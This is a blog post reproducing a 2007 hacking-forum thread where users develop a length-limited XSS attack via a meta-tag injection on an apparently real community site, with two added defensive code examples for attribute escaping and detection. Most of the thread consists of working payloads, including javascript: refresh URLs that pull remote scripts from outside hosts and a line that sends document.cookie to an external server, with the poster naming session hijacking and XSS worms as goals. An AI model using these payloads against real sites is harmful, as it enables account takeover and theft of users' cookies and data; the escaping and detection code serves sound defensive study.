@fc_lamp

About XSS

2013-08-17 22:53:14 | Category: Web technology - Js/Html

HTML tag XSS table: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Grave_accent_obfuscation

How XSS can be achieved inside a meta tag: http://sla.ckers.org/forum/read.php?2,6717 (please read the replies carefully; backup copy of the thread follows)

XSS in meta a tag
Posted by: TMA
Date: February 12, 2007 11:05AM

ok, 
this is how it goes. 

i got an xss point in a meta tag. 
<META name="Description" content="XSS here"> 

so if i write : 
0;url=javascript:xss code" HTTP-EQUIV="refresh 
this will generate : 
<META name="Description" content="0;url=javascript:xss code" HTTP-EQUIV="refresh 
"> 

there are a few limitations that i found : 
* < > tags are being encoded to &lt; and &gt; 
* i have a limit of 130 chars. 
* no limitation on the ' or " chars. 

what i want to do is to inject some js file here to avoid the 130 chars limitation, and run some code that does something. 

under those limitations, what do you offer to do for js file injection ?

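As an added example (not part of the thread or the blog post), the fix the vulnerable site needed: escape the description for the double-quoted attribute context, so the input from the first post cannot terminate the content attribute and smuggle in HTTP-EQUIV="refresh". The weakFilter, escapeAttr and attributeNames functions and the sample payload are constructed here for illustration.

```javascript
// Added example: context-aware escaping for an HTML attribute value.
// The site in the thread encoded < and > but not quotes, so untrusted
// input could close the content attribute and add a new attribute.

// The site's original filter, as described in the first post: only < and >.
function weakFilter(value) {
  return String(value).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Escape every character that can change meaning inside a double-quoted
// HTML attribute. & goes first so already-encoded output is not mangled.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Build the tag the way a template should: untrusted data only ever lands
// inside the quoted attribute value, never as markup.
function renderDescriptionMeta(description) {
  return '<META name="Description" content="' + escapeAttr(description) + '">';
}

// Return the attribute names present in one rendered tag (lower-cased).
// If "http-equiv" shows up, the input escaped the attribute context.
function attributeNames(tag) {
  const names = [];
  const re = /\s([A-Za-z-]+)=("[^"]*"|'[^']*'|[^\s>]+)/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed sample: the exact breakout shape from the first post.
const SAMPLE = '0;url=javascript:xss code" HTTP-EQUIV="refresh';

// With the weak filter the extra attribute survives; with proper escaping
// the whole payload stays inert inside the content attribute.
const WEAK_TAG = '<META name="Description" content="' + weakFilter(SAMPLE) + '">';
const SAFE_TAG = renderDescriptionMeta(SAMPLE);
```

Running attributeNames over WEAK_TAG and SAFE_TAG shows the difference: the weak rendering carries an http-equiv attribute, the escaped one does not.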
Re: XSS in meta a tag
Posted by: Hong
Date: February 12, 2007 12:12PM

php wrote a nice article about how to avoid the size of input limitation. 
http://www.gnucitizen.org/blog/playing-in-large 
Does it help?

- Hong

Re: XSS in meta a tag
Posted by: hasse
Date: February 12, 2007 12:25PM

How about:
javascript:document.write(String.fromCharCode(60)+"script src=http://your-site.ru/script.js"+String.fromCharCode(62))

Re: XSS in meta a tag
Posted by: TMA
Date: February 12, 2007 12:32PM

the input limitation article didn't help. 
the limitation is in the DB . 

I will try the second one, thought about that, but didn't try it yet ... 
thanks . 

i'll post an update on the subject .... 

update : 
this exceeds the 130 chars.... 
need to think how to minimize chars...



Re: XSS in meta a tag
Posted by: hasse
Date: February 12, 2007 01:01PM

80 chars:
javascript:document.write(unescape("%3Cscript src=http://your-site.ru/1.js%3E"))



Re: XSS in meta a tag
Posted by: rsnake
Date: February 12, 2007 03:19PM

That's a nice one, hasse, plus the URL itself is pretty long. That could definitely be shortened when you are ready to deploy the vector.

- RSnake 
Gotta love it. http://ha.ckers.org

Re: XSS in meta a tag
Posted by: TMA
Date: February 12, 2007 03:27PM

ok, 
first, thanks hasse for the help ! 
some updates... 

this is what i enter : 
5;url=javascript:document.write(unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E'))" HTTP-EQUIV="refresh 

and this is what it renders : 
<META name="Description" content="0;url=javascript:document.write(unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E'))" HTTP-EQUIV=" 
refresh"> 

on firefox, after 5 seconds it executes the script in a.js but reloads the page and the original page disappears. 

on the explorer, it does nothing. 

couple question : 
* why on explorer it does not work ? (should it ?) 
* how can i prevent the rerendering of the page on the FF ?

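An added example, not from the thread: a small detector a reviewer or scanner can run over rendered or stored HTML to flag the vector discussed here, a refresh meta tag whose url= target uses the javascript: scheme (after stripping the whitespace and quotes browsers tolerate). The function names and the sample HTML are constructed.

```javascript
// Added example: flag <meta http-equiv="refresh"> tags whose url= target
// is a javascript: URL, the shape rendered in the post above.

// Parse the attributes of one tag body into a name -> value map.
// The first occurrence wins, matching how browsers treat duplicates.
function parseAttributes(tagBody) {
  const attrs = {};
  const re = /([A-Za-z-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    const name = m[1].toLowerCase();
    if (!(name in attrs)) attrs[name] = m[3] || m[4] || m[5] || "";
  }
  return attrs;
}

// Extract the url= part of a refresh content value and normalise it:
// drop surrounding quotes, whitespace and control characters, lower-case.
// Browsers are lenient here, so the scheme check must be too.
function refreshTarget(content) {
  const m = /url\s*=\s*(.*)$/is.exec(content);
  if (!m) return null;
  return m[1]
    .replace(/^['"]|['"]$/g, "")
    .replace(/[\s\x00-\x1f]/g, "")
    .toLowerCase();
}

// Scan HTML and return every refresh meta tag with a javascript: target.
function findMetaRefreshJs(html) {
  const findings = [];
  const metaRe = /<meta\b([^>]*)>/gi;
  let m;
  while ((m = metaRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[1]);
    if ((attrs["http-equiv"] || "").toLowerCase() !== "refresh") continue;
    const target = refreshTarget(attrs.content || "");
    if (target && target.startsWith("javascript:")) {
      findings.push({ tag: m[0], target });
    }
  }
  return findings;
}

// Constructed sample: one injected tag, one benign refresh, one unrelated meta.
const SAMPLE_HTML = [
  "<html><head>",
  '<META name="Description" content="0;url=javascript:document.write(1)" HTTP-EQUIV="refresh">',
  '<meta http-equiv="refresh" content="5; url=/login">',
  '<meta name="viewport" content="width=device-width">',
  "</head><body></body></html>",
].join("\n");
```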
Re: XSS in meta a tag
Posted by: ckore
Date: February 13, 2007 06:06AM

It seems that internet explorer has a problem with javascript within a meta-tag, but I don't know whether it is possible to use this code with IE. 

What exactly don't you want to be rendered? Ever tried something like this: 
"><script>document.write('<script src=http://yoursite/a.js></scr'+'ipt>')</script> 

Quote

That's a nice one, hasse, plus the URL itself is pretty long. That could definitely be shortened when you are ready to deploy the vector.
Yes, for example by using http://tinyurl.com/ or so. You can encode the whole path to your script (including the scripts filename) so that you finally get http://tinyurl.com/1337 which can be used directly as a script src.

Re: XSS in meta a tag
Posted by: TMA
Date: February 13, 2007 07:21AM

as i mentioned, < > tags are being encoded to &lt; and &gt; 
so i can't use that. 

my point is that i don't want the page itself to be rerendered. 
it seems like this executes this : 

javascript:document.write(unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E')) 

as a new page, and it does not inject the script to the current page.

Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 07:26AM

TMA Wrote: 
------------------------------------------------------- 
> as i mentioned, < > tags are being encoded to &lt; 
> and &gt; 
> so i cant use that. 

> my point is that i dont want the page itself to be 
> rerendered. 
> it seems like this executes this : 

> javascript:document.write(unescape('%3Cscript 
> src=http://www.site.com/a.js%3E%3C/script%3E')) 

> as a new page, and it does not inject the script 
> to the current page. 

Maybe you could prevent the reload by using
javascript:document.body.innerHTML+="CODE";
But the page still looks strange if you do that... Is it essential that the page does not reload? Maybe changing where an iframe or image is pointing can work also, but that character limitation is a hindrance.



Re: XSS in meta a tag
Posted by: TMA
Date: February 13, 2007 08:31AM

indeed, 
the char limitation is a tough one. 
this is why i wanted to inject the js file . 

i'll try the suggested approach, and update here. 

another approach that i thought of, is changing the source of an existing script tag. 
but it seems not to be working. 
any idea why ?

Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 09:26AM

For example
javascript:document.body.innerHTML+=unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E');
isn't very long, but it screws up the page. 

Or how about
javascript:void(document.images[0].src='http://site.com/1.jpg?'+document.cookie);

Re: XSS in meta a tag
Posted by: TMA
Date: February 13, 2007 09:35AM

hasse Wrote: 
------------------------------------------------------- 

> Or how 
> about javascript:void(document.images[0].src='http: 
> //site.com/1.jpg?'+document.cookie); 

the last one only retrieves me the cookie...

Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 09:48AM

TMA Wrote: 
------------------------------------------------------- 
> hasse Wrote: 
> -------------------------------------------------- 
> ----- 

> > Or how 
> > about 
> javascript:void(document.images[0].src='http: 
> > //site.com/1.jpg?'+document.cookie); 

> the last one only retrieves me the cookie... 

That's true, but maybe that's not enough for you?

Re: XSS in meta a tag
Posted by: Hong
Date: February 13, 2007 12:20PM

Because it will refresh the page. 
If you want the page to remain unchanged, try this: 
<META name="Description" content="0;url=javascript:document.write('\x3chtml\x3e\x3cbody\x3e'+document.body.innerHTML+'\x3cscript src=http://site/xss.js\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e')" HTTP-EQUIV="refresh"> 

I have not counted it; maybe it exceeds the limitation. If it does, you can use escape() to replace \x with % (it can save some bytes), and some tags can be deleted.

- Hong

Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 12:24PM

Hong Wrote: 
------------------------------------------------------- 
> Because it will refresh the page. 
> If you want the page remain unchange, try this: 


> I have not count it, maybe it exceed the 
> limitation, if it does exceed, you can using 
> escape() to replace \x by %(it can reduce some 
> bytes), and there are some tag can be delete. 


Doesn't that give the same result as
javascript:document.body.innerHTML+=unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E');


And for me, that screws up the page. It seems like that's due to the stylesheet not getting loaded properly. 

javascript:document.body.innerHTML+=unescape('%3Cscript src=http://tinyurl.com/XXXXXX%3E%3Clink rel=stylesheet href=http://tinyurl.com/2oox8e%3E');

Works better...



Re: XSS in meta a tag
Posted by: Hong
Date: February 13, 2007 12:34PM

No, that doesn't give the same result. 
document.body.innerHTML only contains the text between the <body> and </body> tags, so it doesn't have the HTML, HEAD, title and body tags.

- Hong

Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 12:42PM

Hong Wrote: 
------------------------------------------------------- 
> No, that doesn't give the same result. 
> document.body.innerHTML only contain all text 
> within and tag, so it doesn't have HTML, HEAD, 
> title and body tag. 


Ok, but they both use "document.body.innerHTML" and both screw up the page when I run it.

Re: XSS in meta a tag
Posted by: Hong
Date: February 13, 2007 01:17PM

Yes, that method may screw up the page under some situations. 
If the page uses document.write to write anything, then it has already been appended to document.body.innerHTML, so when it refreshes and reconstructs from document.body.innerHTML, it will appear twice. 
All scripts will run twice, which means some things will appear twice (e.g. an alert box).

- Hong

Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 02:41PM

Hong Wrote: 
------------------------------------------------------- 
> Yes, that method maybe screw up the page under 
> some situations. 
> If the page use document.write to write anything, 
> then it had already appended to the 
> document.body.innerHTML, then when it refresh and 
> construct by document.body.innerHTML, it will 
> appear twice. 
> All script will be run twice, that means something 
> will appear twice(e.g. alert box). 


Okay, but like I said, when I try it, it seems like the page loses its style-sheet information and changes appearance significantly.



Re: XSS in meta a tag
Posted by: Hong
Date: February 14, 2007 04:05AM

Style definitions go inside the head section? document.body.innerHTML doesn't include the head section.

- Hong

Re: XSS in meta a tag
Posted by: hasse
Date: February 14, 2007 08:14AM

Hong Wrote: 
------------------------------------------------------- 
> Style definitions goes inside the head section? 
> document.body.innerHTML doesn't include head 
> section. 


Yes, that seems to be the problem. If I run any of the examples with document.body.innerHTML the page loses its style sheet, which changes the appearance of the page a lot. But I guess that might be better than just a blank page. 

But something like
javascript:document.body.innerHTML+=unescape('%3Clink rel=stylesheet href=http://tinyurl.com/2oox8e%3E%3Cscript src=http://tinyurl.com/XXXXXX%3E');
prevents that. But it's kind of long.

Re: XSS in meta a tag
Posted by: TMA
Date: February 14, 2007 08:25AM

ok, you gave me here few ideas... 

first, if the stylesheet goes wrong, you can link it to your own stylesheet via the js file. 

correct me if i'm wrong, but IE7 won't execute javascript in meta tags ? 
another question that arose is, what is the difference between the approach below : 

document.body.innerHTML+= 

and that : 
document.write('CODE') 

does one have some advantage over the other ?

Re: XSS in meta a tag
Posted by: hasse
Date: February 14, 2007 08:48AM

TMA Wrote: 
------------------------------------------------------- 
> ok, you gave me here few ideas... 

> first, if the stylesheet goes wrong, you can link 
> it to your own stylesheet vie js file. 

> correct me if i'm wrong, but IE7 won't execute 
> javascript in meta tags ? 
> another question that rose is, what is the 
> difference between the approach below : 

> document.body.innerHTML+= 

> and that : 
> document.write('CODE') 

> does it got some advantage over the other ? 


"You might as well add the style sheet from your own javascript file instead of right in the meta-tag." Yes of course, that's smarter than what I wrote. 

The difference between those methods seems to be, like you said yourself, that document.write rerenders the page and gives you the code as a new page, whereas document.body.innerHTML+= retains most of the original page. 

And yes it seems IE7 does not accept javascript in meta tags.



Re: XSS in meta a tag
Posted by: TMA
Date: February 14, 2007 03:51PM

ok, some updates... 
seems that the css binding really gets lost on the way, 
so i render the missing line from the js file. 

another weird phenomenon that the "InnerHtml +=" method causes is that links on the page that have a css class seem not to work at all... 
can anyone pinpoint the problem for me ? (Firefox browser...) 

update : 
my mistake, 
the links that do not work are the relative ones... 
any ideas how can i overcome this issue ?



Re: XSS in meta a tag
Posted by: hasse
Date: February 14, 2007 05:21PM

TMA Wrote: 
------------------------------------------------------- 
> ok, some updates... 
> seems that the css binding really get lost in the 
> way, 
> so i render the missing line from the js file. 

> another weird phenomenon that the "InnerHtml +=" 
> method cause is that links on the page that have a 
> css class, seems not to work at all... 
> can anyone pinpoint me the problem ? (Firefox 
> browser...) 

> update : 
> my mistake, 
> the links that do not work are the relative 
> ones... 
> any ideas how can i overcome this issue ? 

I thought "<base href" might work but it seems it didn't. But I guess you could take the entire document.body.innerHTML, modify it from the javascript file, go through it all and fix the links, and then write it to the page. 

Something like: 

document.write("<html><head><link rel=stylesheet href=http://sla.ckers.org/css/style.css></head>");

var body = document.body.innerHTML;
var body_mod = body.replace("a href=/","a href=http://site.com/");

document.write("<body>"+body_mod+"</body></html>");

Just an example, and you could do more like include the proper title to the page etc.



Re: XSS in meta a tag
Posted by: TMA
Date: February 15, 2007 10:45AM

few updates ... 

i used the replace method to change the relative, it works better with regular expressions. 

here is some update on the attack vector progress. 

this is what goes on the page itself : 
0;url=javascript:document.body.innerHTML+=unescape('%3Cscript src=http://tinyurl.com/%3E');" HTTP-EQUIV="refresh 

and the js file contains those lines : 

// for closing the script tag 
document.body.innerHTML += "</script>" 

// adding the original css 
document.body.innerHTML += "<link rel=stylesheet href=http://www.site.com/tpl/def/styless.css>" 

// adding additional js file that has been cutted for some reason 
document.body.innerHTML += "<script src=href=http://www.site.com/dhtml.js></script>"; 

now what i needed is to change the relative links to full links... 

so, with regEx the job is easy... 

Body = Body.replace(/href=\"\//g,"href=\"http://www.site.com/"); 

and to apply the changes i used : 
document.body.innerHTML = Body; 

hasse, if i'm using the document.write method, i will get some nice recursion that will eventually crash the browser (endless addition of the page itself to the InnerHTML) :) 

now what i've got is, from a 130 char xss hole in a meta tag, a wide open file that i can do whatever i want with . 

btw, this is some community site like mySpace, so the possibilities are endless: 
session hijacking, cookie stealing, XSS worms, SEO hack, you name it ... 

this all was a POC. 
but a challenging one .

Re: XSS in meta a tag
Posted by: hasse
Date: February 15, 2007 12:34PM

TMA Wrote: 
------------------------------------------------------- 
> few updates ... 

> i used the replace method to change the relative, 
> it works better with regular expressions. 

> here is some update on the attack vector 
> progress. 

> this is what goes on the page itself : 
> 0;url=javascript:document.body.innerHTML+=unescape 
> ('%3Cscript src=http://tinyurl.com/%3E');" 
> HTTP-EQUIV="refresh 

> and the js file contains those lines : 

> // for closing the script tag 
> document.body.innerHTML += "" 

> // adding the original css 
> document.body.innerHTML += "" 

> // adding additional js file that has been cutted 
> for some reason 
> document.body.innerHTML += ""; 

> now what i needed is to change the relative links 
> to full links... 

> so, with regEx the job is easy... 

> Body = 
> Body.replace(/href=\"\//g,"href=\"http://www.site. 
> com/"); 

> and to apply the changes i used : 
> document.body.innerHTML = Body; 

> hasse, if i'm using the document.write method, i 
> will get some nice recursion that will eventually 
> crash the browser(endless addition of the page 
> itself to the InnerHTML) :) 

> now what i've got from 130 chars xss hole in a 
> meta tag to a wide open file that i can do 
> whatever i want with it . 

> btw, this is some community site like mySpace, so 
> the possibilities are endless: 
> session hijacking, cookie stealing, XSS worms, SEO 
> hack, you name it ... 

> this all was a POC. 
> but a challenging one . 


Well, I'm glad you managed to work out a solution. I hope I helped some in the process. :)

Re: XSS in meta a tag
Posted by: TMA
Date: February 15, 2007 01:49PM

hasse Wrote: 
------------------------------------------------------- 

> Well, I'm glad you managed to work out a solution. 
> I hope I helped some in the process. :) 


Indeed, you sure helped a lot, thanks

